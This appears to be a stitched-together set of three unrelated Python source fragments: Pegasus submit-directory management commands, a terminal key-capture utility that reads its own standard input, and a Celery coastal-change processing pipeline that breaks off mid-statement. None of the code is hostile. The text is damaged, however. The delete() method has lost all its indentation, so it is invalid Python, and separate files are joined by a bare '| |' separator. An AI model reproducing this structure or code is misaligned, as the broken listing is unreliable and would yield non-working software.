        for db in glob.glob(os.path.join(self.submitdir, "*.stampede.db")):
            exclude.add(db)

        # Exclude properties file
        for prop in glob.glob(os.path.join(self.submitdir, "pegasus.*.properties")):
            exclude.add(prop)

        # Visit all the files in the submit dir that we want to archive
        # (top-level entries only, minus the exclusion set).
        def visit(dirpath):
            for name in os.listdir(dirpath):
                filepath = os.path.join(dirpath, name)
                if filepath not in exclude:
                    yield name, filepath

        # Archive present and no lock file => a previous run fully completed.
        if self.is_archived() and not os.path.exists(lockfile):
            raise SubmitDirException("Submit directory already archived")

        if not self.is_archived():
            # Archive the files
            print("Creating archive...")
            tar = tarfile.open(name=tmparchname, mode="w:gz")
            for name, path in visit(self.submitdir):
                tar.add(name=path, arcname=name)
            tar.close()

            # This "commits" the archive step
            os.rename(tmparchname, self.archname)

        # Touch lockfile
        open(lockfile, "w").close()

        # Remove the files and directories
        # We do this here, instead of doing it in the loop above
        # because we want to make sure there are no errors in creating
        # the archive before we start removing files
        print("Removing files...")
        for name, path in visit(self.submitdir):
            if os.path.isfile(path) or os.path.islink(path):
                os.remove(path)
            else:
                shutil.rmtree(path)

        # This "commits" the file removal
        os.unlink(lockfile)

        # Commit the workflow changes
        mdbsession.commit()
        mdbsession.close()
    def move(self, dest):
        """Move this submit directory to dest.

        Updates the master DB record, the workflow DB submit_dir columns,
        the on-disk files, and the braindump metadata.  Sub-workflows
        cannot be moved independently of their root.
        """
        dest = os.path.abspath(dest)

        if os.path.isfile(dest):
            raise SubmitDirException("Destination is a file: %s" % dest)

        if os.path.isdir(dest):
            if os.path.exists(os.path.join(dest, "braindump.txt")):
                raise SubmitDirException("Destination is a submit dir: %s" % dest)
            # Move *into* the existing directory, keeping the basename.
            dest = os.path.join(dest, os.path.basename(self.submitdir))

        # Verify that we aren't trying to move a subworkflow
        if self.is_subworkflow():
            raise SubmitDirException(
                "Subworkflows cannot be moved independent of the root workflow"
            )

        # Connect to master database
        mdbsession = connection.connect_by_submitdir(
            self.submitdir, connection.DBType.MASTER
        )
        mdb = MasterDatabase(mdbsession)

        # Get the workflow record from the master db
        db_url = None
        wf = mdb.get_master_workflow(self.wf_uuid)
        if wf is None:
            db_url = connection.url_by_submitdir(
                self.submitdir, connection.DBType.WORKFLOW
            )
        else:
            # We found an mdb record, so we need to update it

            # Save the master db's pointer
            db_url = wf.db_url

            # Update the master db's db_url
            # Note that this will only update the URL if it is an sqlite file
            # located in the submitdir
            log.info("Old master db_url: %s" % wf.db_url)
            wf.db_url = db_url.replace(self.submitdir, dest)
            log.info("New master db_url: %s" % wf.db_url)

            # Change the master db's submit_dir
            log.info("Old master submit_dir: %s" % wf.submit_dir)
            wf.submit_dir = dest
            log.info("New master submit_dir: %s" % wf.submit_dir)

        # Update the ensemble record if one exists
        ew = mdb.get_ensemble_workflow(self.wf_uuid)
        if ew is not None:
            log.info("Old ensemble submit dir: %s", ew.submitdir)
            ew.submitdir = dest
            log.info("New ensemble submit dir: %s", ew.submitdir)

        # Update the workflow database if we found one
        if db_url is not None:
            dbsession = connection.connect(db_url)
            db = WorkflowDatabase(dbsession)
            root_wf = db.get_workflow(self.wf_uuid)
            db.update_submit_dirs(root_wf.wf_id, self.submitdir, dest)
            dbsession.commit()
            dbsession.close()

        # Move all the files
        shutil.move(self.submitdir, dest)

        # Set new paths in the braindump file
        # NOTE(review): this always writes braindump.txt even when the
        # metadata was read from braindump.yml -- confirm intended.
        self.braindump["submit_dir"] = dest
        self.braindump["basedir"] = os.path.dirname(dest)
        utils.write_braindump(os.path.join(dest, "braindump.txt"), self.braindump)

        # Note that we do not need to update the properties file even though it
        # might contain DB URLs because it cannot contain a DB URL with the submit
        # dir in it.

        # TODO We might want to update all of the absolute paths in the condor submit files
        # if we plan on moving workflows that could be resubmitted in the future

        # TODO We might want to update the braindump files for subworkflows

        # Update master database
        mdbsession.commit()
        mdbsession.close()

        # Finally, update object
        self.submitdir = dest
def delete(self):
"Delete this submit dir and its entry in the master db"
# Verify that we aren't trying to move a subworkflow
if self.is_subworkflow():
raise SubmitDirException(
"Subworkflows cannot be deleted independent of the root workflow"
)
# Confirm that they want to delete the workflow
while True:
try:
input = raw_input
except NameError:
pass
answer = (
input(
"Are you sure you want to delete this workflow? This operation cannot be undone. [y/n]: "
)
.strip()
.lower()
)
if answer == "y":
break
if answer == "n":
return
# Connect to master database
mdbsession = connection.connect_by_submitdir(
self.submitdir, connection.DBType.MASTER
)
mdb = MasterDatabase(mdbsession)
# Delete all of the records from the workflow db if they are not using
# an sqlite db that is in the submit dir.
db_url = connection.url_by_submitdir(self.submitdir, connection.DBType.WORKFLOW)
if self.submitdir not in db_url:
dbsession = connection.connect(db_url)
db = WorkflowDatabase(dbsession)
db.delete_workflow(self.wf_uuid)
dbsession.commit()
dbsession.close()
# Delete the workflow
mdb.delete_master_workflow(self.wf_uuid)
# Remove all the files
shutil.rmtree(self.submitdir)
# Update master db
mdbsession.commit()
mdbsession.close()
    def attach(self):
        """Add a workflow to the master db.

        If a master record already exists it is updated in place;
        otherwise a new MasterWorkflow row (plus its state rows) is built
        from the workflow database.
        """
        # Verify that we aren't trying to attach a subworkflow
        if self.is_subworkflow():
            raise SubmitDirException(
                "Subworkflows cannot be attached independent of the root workflow"
            )

        # Connect to master database
        mdbsession = connection.connect_by_submitdir(
            self.submitdir, connection.DBType.MASTER
        )
        mdb = MasterDatabase(mdbsession)

        # Check to see if it already exists and just update it
        wf = mdb.get_master_workflow(self.wf_uuid)
        if wf is not None:
            print("Workflow is already in master db")
            old_submit_dir = wf.submit_dir
            if old_submit_dir != self.submitdir:
                print("Updating path...")
                wf.submit_dir = self.submitdir
                wf.db_url = connection.url_by_submitdir(
                    self.submitdir, connection.DBType.WORKFLOW
                )
                mdbsession.commit()
            mdbsession.close()
            return

        # Connect to workflow db
        db_url = connection.url_by_submitdir(self.submitdir, connection.DBType.WORKFLOW)
        dbsession = connection.connect(db_url)
        db = WorkflowDatabase(dbsession)

        # Get workflow record
        wf = db.get_workflow(self.wf_uuid)
        if wf is None:
            print("No database record for that workflow exists")
            return

        # Update the workflow record
        wf.submit_dir = self.submitdir
        wf.db_url = db_url

        # Insert workflow record into master db (field-by-field copy)
        mwf = MasterWorkflow()
        mwf.wf_uuid = wf.wf_uuid
        mwf.dax_label = wf.dax_label
        mwf.dax_version = wf.dax_version
        mwf.dax_file = wf.dax_file
        mwf.dag_file_name = wf.dag_file_name
        mwf.timestamp = wf.timestamp
        mwf.submit_hostname = wf.submit_hostname
        mwf.submit_dir = self.submitdir
        mwf.planner_arguments = wf.planner_arguments
        mwf.user = wf.user
        mwf.grid_dn = wf.grid_dn
        mwf.planner_version = wf.planner_version
        mwf.db_url = wf.db_url
        mwf.archived = self.is_archived()
        mdbsession.add(mwf)
        mdbsession.flush()  # We should have the new wf_id after this

        # Query states from workflow database
        states = db.get_workflow_states(wf.wf_id)

        # Insert states into master db
        for s in states:
            ms = MasterWorkflowstate()
            ms.wf_id = mwf.wf_id
            ms.state = s.state
            ms.timestamp = s.timestamp
            ms.restart_count = s.restart_count
            ms.status = s.status
            mdbsession.add(ms)
        mdbsession.flush()

        dbsession.commit()
        dbsession.close()
        mdbsession.commit()
        mdbsession.close()
    def detach(self, wf_uuid=None):
        """Remove any master db entries for the given root workflow.

        When the submit dir exists on disk, its braindump identifies the
        workflow.  Otherwise the default master DB
        (~/.pegasus/workflow.db) is searched by submit dir, and wf_uuid
        must disambiguate when several records match.
        """
        if self.submitdir_exists:
            # Verify that we aren't trying to detach a subworkflow
            if self.is_subworkflow():
                raise SubmitDirException(
                    "Subworkflows cannot be detached independent of the root workflow"
                )

            # Connect to master database
            mdbsession = connection.connect_by_submitdir(
                self.submitdir, connection.DBType.MASTER
            )
            mdb = MasterDatabase(mdbsession)

            # Check to see if it even exists
            wf = mdb.get_master_workflow(self.wf_uuid)
            if wf is None:
                print("Workflow is not in master DB")
            else:
                # Delete the workflow (this will delete the master_workflowstate entries as well)
                mdb.delete_master_workflow(self.wf_uuid)

            # Update the master db
            mdbsession.commit()
            mdbsession.close()
        else:
            # Submit dir is gone: fall back to the default master database.
            home = expanduser("~")
            mdbsession = connection.connect(
                "sqlite:///%s/.pegasus/workflow.db" % home,
                db_type=connection.DBType.MASTER,
            )
            mdb = MasterDatabase(mdbsession)
            try:
                if wf_uuid is None:
                    wfs = mdb.get_master_workflow_for_submitdir(self.submitdir)
                    if wfs:
                        # Ambiguous: list candidates and ask for --wf-uuid.
                        msg = (
                            "Invalid submit dir: %s, Specify --wf-uuid <WF_UUID> to detach\n"
                            % self.submitdir
                        )
                        msg += (
                            "\tWorkflow UUID, DAX Label, Submit Hostname, Submit Dir.\n"
                        )
                        for wf in wfs:
                            msg += "\t{}, {}, {}, {}\n".format(
                                wf.wf_uuid,
                                wf.dax_label,
                                wf.submit_hostname,
                                wf.submit_dir,
                            )
                        raise SubmitDirException(msg)
                    else:
                        raise SubmitDirException(
                            "Invalid submit dir: %s" % self.submitdir
                        )
                else:
                    # Delete
                    mdb.delete_master_workflow(wf_uuid, submit_dir=self.submitdir)

                    # Update the master db
                    mdbsession.commit()
            finally:
                mdbsession.close()
class ExtractCommand(LoggingCommand):
    description = "Extract (uncompress) submit directory"
    usage = "Usage: %prog extract SUBMITDIR"

    def run(self):
        """Validate arguments and extract the submit directory archive."""
        if len(self.args) != 1:
            self.parser.error("Specify SUBMITDIR")
        target = SubmitDir(self.args[0])
        target.extract()
class ArchiveCommand(LoggingCommand):
    description = "Archive (compress) submit directory"
    usage = "Usage: %prog archive SUBMITDIR"

    def run(self):
        """Validate arguments and archive the submit directory."""
        if len(self.args) != 1:
            self.parser.error("Specify SUBMITDIR")
        target = SubmitDir(self.args[0])
        target.archive()
class MoveCommand(LoggingCommand):
    description = "Move a submit directory"
    usage = "Usage: %prog move SUBMITDIR DEST"

    def run(self):
        """Validate arguments and move the submit directory to DEST."""
        if len(self.args) != 2:
            self.parser.error("Specify SUBMITDIR and DEST")
        source, destination = self.args
        SubmitDir(source).move(destination)
class DeleteCommand(LoggingCommand):
    description = "Delete a submit directory and the associated DB entries"
    usage = "Usage: %prog delete SUBMITDIR"

    def run(self):
        """Validate arguments and delete the submit directory."""
        if len(self.args) != 1:
            self.parser.error("Specify SUBMITDIR")
        target = SubmitDir(self.args[0])
        target.delete()
class AttachCommand(LoggingCommand):
    description = "Attach a submit dir to the master db (dashboard)"
    usage = "Usage: %prog attach SUBMITDIR"

    def run(self):
        """Validate arguments and attach the submit directory."""
        if len(self.args) != 1:
            self.parser.error("Specify SUBMITDIR")
        target = SubmitDir(self.args[0])
        target.attach()
class DetachCommand(LoggingCommand):
    description = "Detach a submit dir from the master db (dashboard)"
    usage = "Usage: %prog detach SUBMITDIR"

    def __init__(self):
        LoggingCommand.__init__(self)
        # Optional uuid lets the user disambiguate when the submit dir no
        # longer exists on disk.
        self.parser.add_option(
            "-i",
            "--wf-uuid",
            dest="wf_uuid",
            help="Specify wf_uuid of the workflow to be detached.",
        )

    def run(self):
        """Detach the submit dir; tolerate a missing directory on disk."""
        if len(self.args) != 1:
            self.parser.error("Specify SUBMITDIR")
        target = SubmitDir(self.args[0], raise_err=False)
        target.detach(wf_uuid=self.options.wf_uuid)
class SubmitDirCommand(CompoundCommand):
    """Top-level command dispatching to the submit-dir subcommands."""

    description = "Manages submit directories"
    commands = [
        ("archive", ArchiveCommand),
        ("extract", ExtractCommand),
        ("move", MoveCommand),
        ("delete", DeleteCommand),
        ("attach", AttachCommand),
        ("detach", DetachCommand),
    ]
    # Two-letter shortcuts for each subcommand.
    aliases = {
        "ar": "archive",
        "ex": "extract",
        "mv": "move",
        "rm": "delete",
        "at": "attach",
        "dt": "detach",
    }
def main():
    """The entry point for pegasus-submitdir."""
    command = SubmitDirCommand()
    command.main()
| |
class _Getch:
    """Gets a single character from standard input without echoing.

    From http://code.activestate.com/recipes/134892/ -- the platform
    backend is selected once at construction time: Windows (msvcrt),
    then Mac Carbon, then Unix termios.
    """

    def __init__(self):
        try:
            self.impl = _GetchWindows()
        except ImportError:
            try:
                self.impl = _GetchMacCarbon()
            except (AttributeError, ImportError):
                self.impl = _GetchUnix()

    def __call__(self):
        return self.impl()
class _GetchUnix:
    """getch backend for POSIX terminals using tty/termios raw mode."""

    def __init__(self):
        # import termios now or else you'll get the Unix version on the Mac
        import tty, sys, termios

    def __call__(self):
        import sys, tty, termios
        fd = sys.stdin.fileno()
        # Save the terminal settings so they can be restored afterwards.
        old_settings = termios.tcgetattr(fd)
        try:
            tty.setraw(sys.stdin.fileno())
            ch = sys.stdin.read(1)
        finally:
            # Always restore cooked mode, even if the read raised.
            termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)
        return ch
class _GetchWindows:
    """getch backend built on the Windows msvcrt console API."""

    def __init__(self):
        # Probe for msvcrt here so _Getch can fall back on other platforms.
        import msvcrt

    def __call__(self):
        import msvcrt
        return msvcrt.getch()
class _GetchMacCarbon:
    """
    A function which returns the current ASCII key that is down;
    if no ASCII key is down, the null string is returned. The
    page http://www.mactech.com/macintosh-c/chap02-1.html was
    very helpful in figuring out how to do this.
    """
    def __init__(self):
        import Carbon
        # Probe for the legacy Carbon Event manager attribute; on platforms
        # where it is absent (e.g. Unix) this raises AttributeError, letting
        # _Getch fall back to another backend.
        Carbon.Evt  # see if it has this (in Unix, it doesn't)

    def __call__(self):
        import Carbon
        if Carbon.Evt.EventAvail(0x0008)[0]==0:  # 0x0008 is the keyDownMask
            # No key currently down: return the null string.
            return ''
        else:
            #
            # The event contains the following info:
            # (what,msg,when,where,mod)=Carbon.Evt.GetNextEvent(0x0008)[1]
            #
            # The message (msg) contains the ASCII char which is
            # extracted with the 0x000000FF charCodeMask; this
            # number is converted to an ASCII character with chr() and
            # returned
            #
            (what,msg,when,where,mod)=Carbon.Evt.GetNextEvent(0x0008)[1]
            return chr(msg & 0x000000FF)
import threading
# From http://stackoverflow.com/a/2022629/2924421
class Event(list):
    """A list of callbacks that can be fired as a single callable.

    Invoking the event calls every registered handler, in registration
    order, with the same arguments.
    Based on http://stackoverflow.com/a/2022629/2924421
    """

    def __call__(self, *args, **kwargs):
        for handler in self:
            handler(*args, **kwargs)

    def __repr__(self):
        return "Event(%s)" % list.__repr__(self)
def getKey():
    """Block until a single key press is available and return it.

    Repeatedly polls the platform-specific _Getch implementation until it
    yields a non-empty character (only the Carbon backend can return '').
    """
    # Original used Python-2-only constructs (`xrange`, `sys.maxint`, and the
    # removed `<>` operator, a SyntaxError on Python 3); a plain loop is
    # equivalent and version-agnostic.
    inkey = _Getch()
    while True:
        k = inkey()
        if k != '':
            return k
class KeyCallbackFunction():
    """Pairs a callback with an optional extra parameter and invokes the
    callback on a daemon thread whenever a key arrives."""

    callbackParam = None
    actualFunction = None

    def __init__(self, actualFunction, callbackParam):
        self.actualFunction = actualFunction
        self.callbackParam = callbackParam

    def doCallback(self, inputKey):
        """Fire the wrapped callback with inputKey on a fresh daemon thread.

        No-op when no callback function was supplied.
        """
        if self.actualFunction is None:
            return
        if self.callbackParam is None:
            thread_args = (inputKey,)
        else:
            thread_args = (inputKey, self.callbackParam)
        worker = threading.Thread(target=self.actualFunction, args=thread_args)
        worker.daemon = True
        worker.start()
class KeyCapture():
    """Captures key presses on background threads.

    Begin capturing keys with startCapture(). A separate thread is launched
    that captures key presses, which can then be received via get(),
    getAsync(), and events added via addEvent(). Note that this prevents the
    system from accepting keys as normal (say, in a python shell) because it
    overrides that key capturing behavior.

    If you start capture when it's already been started, an
    InterruptedError("Keys are still being captured") is raised.

    get(), getAsync() and events are independent, so if a key is pressed:

    1. Any calls to get() that are waiting, with lossy on, will return
       that key.
    2. It will be stored in the queue of get keys, so that get() with lossy
       off will return the oldest key pressed not returned by get() yet.
    3. All events will be fired with that key as their input.
    4. It will be stored in the list of getAsync() keys, where that list
       will be returned and set to empty list on the next call to getAsync().
    """

    def __init__(self):
        # All of this state used to be declared at class level, which made
        # every KeyCapture instance share the same locks and key queues;
        # it is now per-instance.
        self.gotKeyLock = threading.Lock()
        self.gotKeys = []
        self.gotKeyEvent = threading.Event()
        self.keyBlockingSetKeyLock = threading.Lock()
        self.addingEventsLock = threading.Lock()
        self.keyReceiveEvents = Event()
        self.keysGotLock = threading.Lock()
        self.keysGot = []
        self.keyBlockingKeyLockLossy = threading.Lock()
        self.keyBlockingKeyLossy = None
        self.keyBlockingEventLossy = threading.Event()
        self.keysBlockingGotLock = threading.Lock()
        self.keysBlockingGot = []
        self.keyBlockingGotEvent = threading.Event()
        self.wantToStopLock = threading.Lock()
        self.wantToStop = False
        self.stoppedLock = threading.Lock()
        self.stopped = True
        self.isRunningEvent = False
        self.getKeyThread = None
        self.keyFunction = None
        self.keyArgs = None

    def startCapture(self, keyFunction=None, args=None):
        """Begin capturing keys in two background daemon threads.

        keyFunction, if given, is called as keyFunction(key, args) for every
        captured key (intended for stopping capture as desired).

        Raises:
            InterruptedError: if keys are already being captured.
        """
        # Make sure we aren't already capturing keys
        self.stoppedLock.acquire()
        if not self.stopped:
            self.stoppedLock.release()
            raise InterruptedError("Keys are still being captured")
        self.stopped = False
        self.stoppedLock.release()
        # If we have captured before, we need to allow the get() calls to
        # actually wait for key presses now by clearing the event
        if self.keyBlockingEventLossy.is_set():
            self.keyBlockingEventLossy.clear()
        # Have one function that we call every time a key is captured,
        # intended for stopping capture as desired
        self.keyFunction = keyFunction
        self.keyArgs = args
        # Begin capturing keys (in a seperate thread)
        self.getKeyThread = threading.Thread(target=self._threadProcessKeyPresses)
        self.getKeyThread.daemon = True
        self.getKeyThread.start()
        # Process key captures (in a seperate thread)
        self.getKeyThread = threading.Thread(target=self._threadStoreKeyPresses)
        self.getKeyThread.daemon = True
        self.getKeyThread.start()

    def capturing(self):
        """Return True while the capture threads are running."""
        self.stoppedLock.acquire()
        isCapturing = not self.stopped
        self.stoppedLock.release()
        return isCapturing

    # Stops the thread that is capturing keys on the first opporunity it
    # has to do so. It usually can't stop immediately because getting a key
    # is a blocking process, so this will probably stop capturing after the
    # next key is pressed.
    #
    # However, sometimes if you call stopCapture it will stop before starting
    # capturing the next key, due to multithreading race conditions. So if you
    # want to stop capturing reliably, call stopCapture in a function added via
    # addEvent. Then you are guaranteed that capturing will stop immediately
    # after the rest of the callback functions are called (before starting to
    # capture the next key).
    def stopCapture(self):
        self.wantToStopLock.acquire()
        self.wantToStop = True
        self.wantToStopLock.release()

    # Takes in a function that will be called every time a key is pressed
    # (with that key passed in as the first paramater in that function)
    def addEvent(self, keyPressEventFunction, args=None):
        self.addingEventsLock.acquire()
        callbackHolder = KeyCallbackFunction(keyPressEventFunction, args)
        self.keyReceiveEvents.append(callbackHolder.doCallback)
        self.addingEventsLock.release()

    def clearEvents(self):
        """Discard every event handler registered via addEvent."""
        self.addingEventsLock.acquire()
        self.keyReceiveEvents = Event()
        self.addingEventsLock.release()

    # Gets a key captured by this KeyCapture, blocking until a key is pressed.
    # There is an optional lossy paramater:
    # If True all keys before this call are ignored, and the next pressed key
    #   will be returned.
    # If False this will return the oldest key captured that hasn't
    #   been returned by get yet. False is the default.
    def get(self, lossy=False):
        if lossy:
            # Wait for the next key to be pressed
            self.keyBlockingEventLossy.wait()
            self.keyBlockingKeyLockLossy.acquire()
            keyReceived = self.keyBlockingKeyLossy
            self.keyBlockingKeyLockLossy.release()
            return keyReceived
        else:
            while True:
                # Wait until a key is pressed
                self.keyBlockingGotEvent.wait()
                # Get the key pressed
                readKey = None
                self.keysBlockingGotLock.acquire()
                # Get a key if it exists
                if len(self.keysBlockingGot) != 0:
                    readKey = self.keysBlockingGot.pop(0)
                # If we got the last one, tell us to wait
                if len(self.keysBlockingGot) == 0:
                    self.keyBlockingGotEvent.clear()
                self.keysBlockingGotLock.release()
                # Process the key (if it actually exists)
                if not readKey is None:
                    return readKey
                # Exit if we are stopping
                self.wantToStopLock.acquire()
                if self.wantToStop:
                    self.wantToStopLock.release()
                    return None
                self.wantToStopLock.release()

    def clearGetList(self):
        """Drop any keys queued for non-lossy get()."""
        self.keysBlockingGotLock.acquire()
        self.keysBlockingGot = []
        self.keysBlockingGotLock.release()

    # Gets a list of all keys pressed since the last call to getAsync, in
    # order from first pressed, second pressed, .., most recent pressed
    def getAsync(self):
        self.keysGotLock.acquire()
        keysPressedList = list(self.keysGot)
        self.keysGot = []
        self.keysGotLock.release()
        return keysPressedList

    def clearAsyncList(self):
        """Drop any keys queued for getAsync()."""
        self.keysGotLock.acquire()
        self.keysGot = []
        self.keysGotLock.release()

    def _processKey(self, readKey):
        # Append to list for GetKeyAsync
        self.keysGotLock.acquire()
        self.keysGot.append(readKey)
        self.keysGotLock.release()
        # Call lossy blocking key events
        self.keyBlockingKeyLockLossy.acquire()
        self.keyBlockingKeyLossy = readKey
        self.keyBlockingEventLossy.set()
        self.keyBlockingEventLossy.clear()
        self.keyBlockingKeyLockLossy.release()
        # Call non-lossy blocking key events
        self.keysBlockingGotLock.acquire()
        self.keysBlockingGot.append(readKey)
        if len(self.keysBlockingGot) == 1:
            self.keyBlockingGotEvent.set()
        self.keysBlockingGotLock.release()
        # Call events added by AddEvent
        self.addingEventsLock.acquire()
        self.keyReceiveEvents(readKey)
        self.addingEventsLock.release()

    def _threadProcessKeyPresses(self):
        # Consumer thread: drains keys queued by _threadStoreKeyPresses and
        # fans them out to the get()/getAsync()/event channels.
        while True:
            # Wait until a key is pressed
            self.gotKeyEvent.wait()
            # Get the key pressed
            readKey = None
            self.gotKeyLock.acquire()
            # Get a key if it exists
            if len(self.gotKeys) != 0:
                readKey = self.gotKeys.pop(0)
            # If we got the last one, tell us to wait
            if len(self.gotKeys) == 0:
                self.gotKeyEvent.clear()
            self.gotKeyLock.release()
            # Process the key (if it actually exists)
            if not readKey is None:
                self._processKey(readKey)
            # Exit if we are stopping
            self.wantToStopLock.acquire()
            if self.wantToStop:
                self.wantToStopLock.release()
                break
            self.wantToStopLock.release()

    def _threadStoreKeyPresses(self):
        # Producer thread: blocks on getKey() and queues each key pressed.
        while True:
            # Get a key
            readKey = getKey()
            # Run the potential shut down function
            if not self.keyFunction is None:
                self.keyFunction(readKey, self.keyArgs)
            # Add the key to the list of pressed keys
            self.gotKeyLock.acquire()
            self.gotKeys.append(readKey)
            if len(self.gotKeys) == 1:
                self.gotKeyEvent.set()
            self.gotKeyLock.release()
            # Exit if we are stopping
            self.wantToStopLock.acquire()
            if self.wantToStop:
                self.wantToStopLock.release()
                self.gotKeyEvent.set()
                break
            self.wantToStopLock.release()
        # If we have reached here we stopped capturing.
        # All we need to do to clean up is ensure that
        # all the calls to .get() now return None.
        # To ensure no calls are stuck never returning,
        # we will leave the event set so any tasks waiting
        # for it immediately exit. This will be unset upon
        # starting key capturing again.
        self.stoppedLock.acquire()
        # We also need to set this to True so we can start up
        # capturing again. (The original assigned it twice.)
        self.stopped = True
        self.keyBlockingKeyLockLossy.acquire()
        self.keyBlockingKeyLossy = None
        self.keyBlockingEventLossy.set()
        self.keyBlockingKeyLockLossy.release()
        self.keysBlockingGotLock.acquire()
        self.keyBlockingGotEvent.set()
        self.keysBlockingGotLock.release()
        self.stoppedLock.release()
| |
from django.db.models import F
from celery.task import task
from celery import chain, group, chord
from celery.utils.log import get_task_logger
from datetime import datetime, timedelta
import xarray as xr
import os
import imageio
from utils.data_cube_utilities.data_access_api import DataAccessApi
from utils.data_cube_utilities.dc_coastal_change import compute_coastal_change, mask_mosaic_with_coastal_change, mask_mosaic_with_coastlines
from utils.data_cube_utilities.dc_utilities import (create_cfmask_clean_mask, create_bit_mask, write_geotiff_from_xr,
write_png_from_xr, add_timestamp_data_to_xr, clear_attrs, convert_range)
from utils.data_cube_utilities.dc_chunker import (create_geographic_chunks, group_datetimes_by_year,
combine_geographic_chunks)
from apps.dc_algorithm.utils import create_2d_plot, _get_datetime_range_containing
from utils.data_cube_utilities.import_export import export_xarray_to_netcdf
from .models import CoastalChangeTask
from apps.dc_algorithm.models import Satellite
from apps.dc_algorithm.tasks import DCAlgorithmBase, check_cancel_task, task_clean_up
logger = get_task_logger(__name__)
class BaseTask(DCAlgorithmBase):
    """Base Celery task class for the coastal_change app; app_name scopes the
    tasks within the dc_algorithm framework."""
    app_name = 'coastal_change'
@task(name="coastal_change.run", base=BaseTask)
def run(task_id=None):
    """Responsible for launching task processing using celery asynchronous processes

    Chains the parsing of parameters, validation, chunking, and the start to data processing.
    """
    workflow = chain(
        parse_parameters_from_task.s(task_id=task_id),
        validate_parameters.s(task_id=task_id),
        perform_task_chunking.s(task_id=task_id),
        start_chunk_processing.s(task_id=task_id),
    )
    return workflow()
@task(name="coastal_change.parse_parameters_from_task", base=BaseTask, bind=True)
def parse_parameters_from_task(self, task_id=None):
    """Parse out required DC parameters from the task model.

    See the DataAccessApi docstrings for more information.
    Parses out platforms, products, etc. to be used with DataAccessApi calls.

    If this is a multisensor app, platform and product should be pluralized and used
    with the get_stacked_datasets_by_extent call rather than the normal get.

    Returns:
        parameter dict with all keyword args required to load data.
    """
    task = CoastalChangeTask.objects.get(pk=task_id)
    # The time range spans the full start year through the full end year.
    time_range = (datetime(task.time_start, 1, 1), datetime(task.time_end, 12, 31))
    parameters = {
        'product': task.satellite.get_products(task.area_id)[0],
        'time': time_range,
        'longitude': (task.longitude_min, task.longitude_max),
        'latitude': (task.latitude_min, task.latitude_max),
        'measurements': task.satellite.get_measurements(),
    }
    task.execution_start = datetime.now()
    if check_cancel_task(self, task):
        return
    task.update_status("WAIT", "Parsed out parameters.")
    return parameters
@task(name="coastal_change.validate_parameters", base=BaseTask, bind=True)
def validate_parameters(self, parameters, task_id=None):
    """Validate parameters generated by the parameter parsing task

    All validation should be done here - are there data restrictions?
    Combinations that aren't allowed? etc.

    Returns:
        parameter dict with all keyword args required to load data.
        -or-
        updates the task with ERROR and a message, returning None
    """
    task = CoastalChangeTask.objects.get(pk=task_id)
    if check_cancel_task(self, task): return
    dc = DataAccessApi(config=task.config_path)
    # Ensure the datacube connection is released on every exit path; the
    # previous version leaked it on the early-return error branches.
    try:
        validation_params = dict(parameters)
        # verify that both the start and end year have acquisitions
        for year in parameters['time']:
            validation_params.update({'time': (year, year.replace(year=year.year + 1))})
            acquisitions = dc.list_acquisition_dates(**validation_params)
            if len(acquisitions) < 1:
                task.complete = True
                task.update_status("ERROR", "There must be at least one acquisition in both the start and ending year.")
                return None
        if check_cancel_task(self, task): return
        task.update_status("WAIT", "Validated parameters.")
        if not dc.validate_measurements(parameters['product'], parameters['measurements']):
            task.complete = True
            task.update_status(
                "ERROR",
                "The provided Satellite model measurements aren't valid for the product. Please check the measurements listed in the {} model.".
                format(task.satellite.name))
            return None
    finally:
        dc.close()
    return parameters
@task(name="coastal_change.perform_task_chunking", base=BaseTask, bind=True)
def perform_task_chunking(self, parameters, task_id=None):
    """Chunk parameter sets into more manageable sizes

    Uses functions provided by the task model to create a group of
    parameter sets that make up the arg.

    Args:
        parameters: parameter stream containing all kwargs to load data

    Returns:
        parameters with a list of geographic and time ranges
    """
    # Upstream validation signals failure by propagating None.
    if parameters is None:
        return None
    task = CoastalChangeTask.objects.get(pk=task_id)
    if check_cancel_task(self, task): return
    dc = DataAccessApi(config=task.config_path)
    dates = dc.list_acquisition_dates(**parameters)
    task_chunk_sizing = task.get_chunk_size()
    # Split the requested bounding box into smaller lat/lon tiles sized per
    # the task model's chunk settings.
    geographic_chunks = create_geographic_chunks(
        longitude=parameters['longitude'],
        latitude=parameters['latitude'],
        geographic_chunk_size=task_chunk_sizing['geographic'])
    grouped_dates = group_datetimes_by_year(dates)
    # we need to pair these with the first year - subsequent years.
    time_chunks = None
    if task.animated_product.animation_id == 'none':
        # first and last only
        time_chunks = [[grouped_dates[task.time_start], grouped_dates[task.time_end]]]
    else:
        # Animated output: pair the initial year with every later year.
        initial_year = grouped_dates.pop(task.time_start)
        time_chunks = [[initial_year, grouped_dates[year]] for year in grouped_dates]
    dc.close()
    if check_cancel_task(self, task): return
    task.update_status("WAIT", "Chunked parameter set.")
    return {'parameters': parameters, 'geographic_chunks': geographic_chunks, 'time_chunks': time_chunks}
@task(name="coastal_change.start_chunk_processing", base=BaseTask, bind=True)
def start_chunk_processing(self, chunk_details, task_id=None):
    """Create a fully asyncrhonous processing pipeline from paramters and a list of chunks.

    The most efficient way to do this is to create a group of time chunks for each geographic chunk,
    recombine over the time index, then combine geographic last.
    If we create an animation, this needs to be reversed - e.g. group of geographic for each time,
    recombine over geographic, then recombine time last.

    The full processing pipeline is completed, then the create_output_products task is triggered, completing the task.
    """
    # Upstream chunking signals failure by propagating None.
    if chunk_details is None:
        return None
    parameters = chunk_details.get('parameters')
    geographic_chunks = chunk_details.get('geographic_chunks')
    time_chunks = chunk_details.get('time_chunks')
    task = CoastalChangeTask.objects.get(pk=task_id)
    # This calculation does not account for time chunking because this app
    # does not support time chunking.
    num_times_fst_lst_yrs = len(time_chunks[0][0]) + len(time_chunks[0][1])
    task.total_scenes = len(geographic_chunks) * len(time_chunks) * num_times_fst_lst_yrs
    task.scenes_processed = 0
    task.save()
    if check_cancel_task(self, task): return
    task.update_status("WAIT", "Starting processing.")
    logger.info("START_CHUNK_PROCESSING")
    # For each time chunk: process every geographic chunk in parallel, then
    # recombine geographically; once all time chunks are done, recombine over
    # time, build the output products, and finally clean up temp state.
    processing_pipeline = (group([
        group([
            processing_task.s(
                task_id=task_id,
                geo_chunk_id=geo_index,
                time_chunk_id=time_index,
                geographic_chunk=geographic_chunk,
                time_chunk=time_chunk,
                **parameters) for geo_index, geographic_chunk in enumerate(geographic_chunks)
        ]) | recombine_geographic_chunks.s(task_id=task_id) for time_index, time_chunk in enumerate(time_chunks)
    ]) | recombine_time_chunks.s(task_id=task_id) | create_output_products.s(task_id=task_id)\
